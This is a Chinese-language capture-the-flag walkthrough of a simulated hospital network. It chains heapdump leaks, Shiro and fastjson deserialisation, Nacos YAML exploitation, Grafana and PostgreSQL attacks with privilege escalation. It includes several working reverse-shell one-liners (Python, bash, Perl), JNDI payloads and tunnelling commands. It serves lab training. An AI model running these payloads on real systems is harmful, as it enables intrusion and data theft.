简介:
在这个场景中,你将扮演一名渗透测试工程师,被派遣去测试某家医院的网络安全性。你的目标是成功获取所有服务器的权限,以评估公司的网络安全状况。该靶场共有 4 个flag,分布于不同的靶机。
靶场链接:
https://yunjing.ichunqiu.com/major/detail/1106?type=1
挑战开始:
flag01:
开启靶场后使用fscan尝试扫描一下,发现开放了8080和22端口,并且存在heapdump文件泄露
访问
http://121.89.217.33:8080/actuator/heapdump
成功下载heapdump文件
这里使用JDumpSpider来进行敏感信息搜集
https://github.com/whwlsfb/JDumpSpider
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
这里发现了一个shiro key
检测了下网站,发现确实存在shiro组件,同时找到的key也是正确的
这里直接一键检测利用链,成功利用
这里直接注入了内存马
这里发现权限比较低,尝试提权
find / -user root -perm -4000 -exec ls -ldb {} \;
这里通过查询,发现vim.basic进行提权
这里需要有一个交互shell,冰蝎的虚拟终端打不开,这里反弹一个先
通过测试,发现存在python3环境
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("119.xxx.xxx.xxx",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
成功反弹shell
接着改下交互
python3 -c "import pty;pty.spawn('/bin/bash')"
接着提权
/usr/bin/vim.basic -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
成功提权
成功找到flag01
flag02:
上传fscan扫描下内网
172.30.12.236:22 open
172.30.12.5:22 open
172.30.12.6:8848 open
172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.6:445 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:8009 open
[*] NetBios 172.30.12.6 WORKGROUP\SERVER02
[*] NetInfo
[*]172.30.12.6
[->]Server02
[->]172.30.12.6
[*] WebTitle http://172.30.12.5:8080 code:302 len:0 title:None 跳转url: http://172.30.12.5:8080/login;jsessionid=CD5487B3575352F614713BA1C5783284
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=CD5487B3575352F614713BA1C5783284 code:200 len:2005 title:医疗管理后台
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964 title:医院后台管理平台
[*] WebTitle http://172.30.12.6:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file
这里发现内网存在一个nacos未授权访问漏洞
先用frp做好隧道
访问http://172.30.12.6:8848/nacos
先试了一下nacos/nacos
直接进了后台,那就不需要利用漏洞添加账号了
这里发现了配置文件中的账号密码
但是尝试了下,并没有好的利用方式
查了下nacos其他漏洞,发现有一个 Nacos Client Yaml 反序列化漏洞
https://github.com/artsploit/yaml-payload
这里改下执行的命令,改成添加用户
接着重新打包
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
这里打包的时候javac版本最好是1.8,17编译的有问题
接着把打包好的jar上传到flag01的机器上,并开启http服务
接着利用工具
https://github.com/charonlight/NacosExploitGUI/releases/tag/v4.0
一开始用的java17打包的,一直不行,换成1.8之后就可以了
成功找到flag02
flag03
回到上面,看到还有一个web
访问http://172.30.12.236:8080
抓包看一下,发现是json传参
联想到题目中的提示fastjson
先尝试一下
确实存在fastjson
打一下fastjson payload
{"aaa":{"@type":"java.net.Inet4Address","val":"365w9v.dnslog.cn"}}
成功收到回显
接着使用工具jndi_tool.jar部署恶意类
https://github.com/wyzxxz/jndi_tool
java -cp jndi_tool.jar jndi.EvilRMIServer 8888 1099 "bash -i >& /dev/tcp/172.30.12.5/9595 0>&1"
这里一开始是想在外网,但是不出网,所以还是在flag01的机器上做的
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://172.30.12.5:8888/Object",
"autoCommit":true
}
}
成功反弹shell
成功找到flag03
flag04
查看了下发现多网卡
从flag01机器上下载fscan扫了下新网段
发现存在一个grafana
这里需要做多层隧道,这里用的ew
在公网vps上执行上执行:
ew_for_Win.exe -s lcx_listen -l 1080 -e 8888
在web01上执行
./ew -s lcx_slave -d 公网vpsIP -e 8888 -f 172.30.12.236 -g 9999
在web03上执行
./ew -s ssocksd -l 9999
这样socks代理做公网vps的1080端口就可以访问grafana了
尝试弱口令admin/admin
成功进入后台
这里直接用漏洞检测工具检测下
https://github.com/A-D-Team/grafanaExp
直接本地kali挂代理检测下,但是挂代理经常报错
不得已到web03上去执行(全程被各种反弹的shell ctrl+C会掉shell搞崩溃,直接吧隧道重新做到了后台)
./grafanaExp_linux_amd64 exp -u http://172.30.54.12:3000
这里成功发现了postgres的密码
通过代理成功使用navicat连接
SELECT "version"()
查询了下版本
这里本地kali挂着proxychains4 使用MDUT来利用
https://github.com/SafeGroceryStore/MDUT
但是还是报错了。。。
心态炸裂
只能手动执行
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
反弹shell
select system('perl -e \'use Socket;$i="172.30.54.179";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');
尝试提权,这里发现/usr/local/postgresql/bin/psql可以免密sudo执行
参考提权
https://gtfobins.github.io/gtfobins/psql/
尝试提权
发现这里要用root账户的密码
改一下root的密码
ALTER USER root WITH PASSWORD '123456';
sudo /usr/local/postgresql/bin/psql
\?
!/bin/bash
cat /root/flag/flag04.txt
成功获取flag
Comments NOTHING